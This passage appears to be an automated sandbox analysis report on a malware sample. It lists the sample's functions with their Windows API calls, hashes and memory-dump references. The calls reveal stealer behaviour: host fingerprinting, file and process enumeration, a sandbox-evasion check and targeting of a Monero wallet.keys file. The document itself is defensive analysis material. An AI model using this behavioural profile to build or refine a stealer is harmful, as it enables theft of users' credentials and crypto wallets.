Opcode Fuzzy Hash: 70e2e2e115e026cc112e5be7ae40d7f2528e2b885bc3f20561849b52b5031f70
Instruction Fuzzy Hash: 82111F30900508A6CB15FF60DD52EED7778AF50301F408654FC1A5E5A2EF306B09E791

Function 00354F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B

lstrcat.KERNEL32(?,00000000), ref: 00354F7A
lstrcat.KERNEL32(?,00361070), ref: 00354F97
lstrcat.KERNEL32(?,01279030), ref: 00354FAB
lstrcat.KERNEL32(?,00361074), ref: 00354FBD

Part of subcall function 00354910: wsprintfA.USER32 ref: 0035492C
Part of subcall function 00354910: FindFirstFileA.KERNEL32(?,?), ref: 00354943

Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,00360FDC), ref: 00354971
Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,00360FE0), ref: 00354987
Part of subcall function 00354910: FindNextFileA.KERNEL32(000000FF,?), ref: 00354B7D
Part of subcall function 00354910: FindClose.KERNEL32(000000FF), ref: 00354B92

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 3d9dcec66de9f52559030f52e302bdb643b0ea726dde6c4cd072b7b909b23afa
Instruction ID: 5491a15656770b4064f3ee6a58cc519c49a4abe77bcf677c13552b5533449186
Opcode Fuzzy Hash: 3d9dcec66de9f52559030f52e302bdb643b0ea726dde6c4cd072b7b909b23afa
Instruction Fuzzy Hash: 5121DD7690020467DB55FBB0DC46EED337CAB54300F004545BA49AA195EE7496CD9FA2

Function 00350740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,012791A0), ref: 0035079A
StrCmpCA.SHLWAPI(00000000,01279130), ref: 00350866
StrCmpCA.SHLWAPI(00000000,01279080), ref: 0035099D

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 46bf7574e66d4c1f81a4a25b4c8adfbd039231e14084afdab6f789724b1c0df0
Instruction ID: 274c36693a4fc0adc6bf90e0e4ba04dd7e63c045c7bf35df1123d075a86ba0c3
Opcode Fuzzy Hash: 46bf7574e66d4c1f81a4a25b4c8adfbd039231e14084afdab6f789724b1c0df0
Instruction Fuzzy Hash: 1E918775A102089FCB29EF64D991FEDB7B5FF94300F408519EC0A9F251DB31AA09DB92

Function 00350765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,012791A0), ref: 0035079A
StrCmpCA.SHLWAPI(00000000,01279130), ref: 00350866
StrCmpCA.SHLWAPI(00000000,01279080), ref: 0035099D

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 5c37f6ea5a0f245ad506a86926820f3cd919f2147355a49447dc2e940f3b9135
Instruction ID: 8bcf546a835654eb077368beb7bdd846dc7310e7e292c142845264255bfd6098
Opcode Fuzzy Hash: 5c37f6ea5a0f245ad506a86926820f3cd919f2147355a49447dc2e940f3b9135
Instruction Fuzzy Hash: 61817675B102089FCB19EF64C991EEDB7B5FF94300F508519EC0A9F255DB30AA0ADB92

Function 003578E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357910
RtlAllocateHeap.NTDLL(00000000), ref: 00357917
GetComputerNameA.KERNEL32(?,00000104), ref: 0035792F

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: b8b80d4a059a0a86856823d9a5b13344d9debc4e8fdbbf477868ac902d30917d
Instruction ID: 8fe26494bcd6fe7142d658902e07557b935ebeaa651a54b75a60f0d97ba0d8c8
Opcode Fuzzy Hash: b8b80d4a059a0a86856823d9a5b13344d9debc4e8fdbbf477868ac902d30917d
Instruction Fuzzy Hash: AF016DB1A04208EBD710DF98DD45FAAFBB8FB04B22F10421AEE45A2690C37459088BA1

Function 00359470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00359484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 003594A5
CloseHandle.KERNEL32(00000000), ref: 003594AF

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: a6d9bd4508ba76ccae4d4f0823a2e8a1dfc1ff36111cf97cdf2b9fe9bf5311b7
Instruction ID: ace4d52ea5c9533e4164ecf45fe928981b1028aadd538c4b9f5d3b651063f593
Opcode Fuzzy Hash: a6d9bd4508ba76ccae4d4f0823a2e8a1dfc1ff36111cf97cdf2b9fe9bf5311b7
Instruction Fuzzy Hash: 7AF05E7490020CFBEB05DFA4DC4AFED7778EB08301F004599BE09AB290D6B06E89DB91

Function 00341110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0034112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00341132
ExitProcess.KERNEL32 ref: 00341143

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 2c5592431f8916741811e0bcb736b516c365f7eacc7d103008f228f3c6f1bcd8
Instruction ID: a8f467ad42c93c1126d2746b8ed9821c7bd4229069f2be097e4aaaf657b2c99d
Opcode Fuzzy Hash: 2c5592431f8916741811e0bcb736b516c365f7eacc7d103008f228f3c6f1bcd8
Instruction Fuzzy Hash: 96E0E670A45348FBF710ABA09C0AB1976B8EB14B41F105055FB09BA1D0D6B53645AB9A

Function 00351A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 00357500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00357542
Part of subcall function 00357500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0035757F
Part of subcall function 00357500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357603
Part of subcall function 00357500: RtlAllocateHeap.NTDLL(00000000), ref: 0035760A

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 00357690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003576A4
Part of subcall function 00357690: RtlAllocateHeap.NTDLL(00000000), ref: 003576AB

Part of subcall function 003577C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0035DBC0,000000FF,?,00351C99,00000000,?,0127DA90,00000000,?), ref: 003577F2
Part of subcall function 003577C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0035DBC0,000000FF,?,00351C99,00000000,?,0127DA90,00000000,?), ref: 003577F9

Part of subcall function 00357850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003411B7), ref: 00357880
Part of subcall function 00357850: RtlAllocateHeap.NTDLL(00000000), ref: 00357887
Part of subcall function 00357850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0035789F

Part of subcall function 003578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357910
Part of subcall function 003578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00357917
Part of subcall function 003578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0035792F

Part of subcall function 00357980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00360E00,00000000,?), ref: 003579B0
Part of subcall function 00357980: RtlAllocateHeap.NTDLL(00000000), ref: 003579B7
Part of subcall function 00357980: GetLocalTime.KERNEL32(?,?,?,?,?,00360E00,00000000,?), ref: 003579C4
Part of subcall function 00357980: wsprintfA.USER32 ref: 003579F3

Part of subcall function 00357A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0127E2E0,00000000,?,00360E10,00000000,?,00000000,00000000), ref: 00357A63
Part of subcall function 00357A30: RtlAllocateHeap.NTDLL(00000000), ref: 00357A6A
Part of subcall function 00357A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0127E2E0,00000000,?,00360E10,00000000,?,00000000,00000000,?), ref: 00357A7D

Part of subcall function 00357B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,0127E2E0,00000000,?,00360E10,00000000,?,00000000,00000000), ref: 00357B35

Part of subcall function 00357B90: GetKeyboardLayoutList.USER32(00000000,00000000,003605AF), ref: 00357BE1
Part of subcall function 00357B90: LocalAlloc.KERNEL32(00000040,?), ref: 00357BF9
Part of subcall function 00357B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 00357C0D
Part of subcall function 00357B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00357C62
Part of subcall function 00357B90: LocalFree.KERNEL32(00000000), ref: 00357D22

Part of subcall function 00357D80: GetSystemPowerStatus.KERNEL32(?), ref: 00357DAD

GetCurrentProcessId.KERNEL32(00000000,?,0127DCD0,00000000,?,00360E24,00000000,?,00000000,00000000,?,0127E220,00000000,?,00360E20,00000000), ref: 0035207E

Part of subcall function 00359470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00359484
Part of subcall function 00359470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 003594A5
Part of subcall function 00359470: CloseHandle.KERNEL32(00000000), ref: 003594AF

Part of subcall function 00357E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357E37
Part of subcall function 00357E00: RtlAllocateHeap.NTDLL(00000000), ref: 00357E3E
Part of subcall function 00357E00: RegOpenKeyExA.KERNEL32(80000002,0126BE48,00000000,00020119,?), ref: 00357E5E
Part of subcall function 00357E00: RegQueryValueExA.KERNEL32(?,0127DC50,00000000,00000000,000000FF,000000FF), ref: 00357E7F
Part of subcall function 00357E00: RegCloseKey.ADVAPI32(?), ref: 00357E92

Part of subcall function 00357F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00357FC9
Part of subcall function 00357F60: GetLastError.KERNEL32 ref: 00357FD8

Part of subcall function 00357ED0: GetSystemInfo.KERNEL32(00360E2C), ref: 00357F00
Part of subcall function 00357ED0: wsprintfA.USER32 ref: 00357F16

Part of subcall function 00358100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0127E2B0,00000000,?,00360E2C,00000000,?,00000000), ref: 00358130
Part of subcall function 00358100: RtlAllocateHeap.NTDLL(00000000), ref: 00358137
Part of subcall function 00358100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00358158
Part of subcall function 00358100: __aulldiv.LIBCMT ref: 00358172
Part of subcall function 00358100: __aulldiv.LIBCMT ref: 00358180
Part of subcall function 00358100: wsprintfA.USER32 ref: 003581AC

Part of subcall function 003587C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00360E28,00000000,?), ref: 0035882F
Part of subcall function 003587C0: RtlAllocateHeap.NTDLL(00000000), ref: 00358836
Part of subcall function 003587C0: wsprintfA.USER32 ref: 00358850

Part of subcall function 00358320: RegOpenKeyExA.KERNEL32(00000000,0127B3F8,00000000,00020019,00000000,003605B6), ref: 003583A4

Part of subcall function 00358320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00358426
Part of subcall function 00358320: wsprintfA.USER32 ref: 00358459
Part of subcall function 00358320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0035847B
Part of subcall function 00358320: RegCloseKey.ADVAPI32(00000000), ref: 0035848C
Part of subcall function 00358320: RegCloseKey.ADVAPI32(00000000), ref: 00358499

Part of subcall function 00358680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003605B7), ref: 003586CA
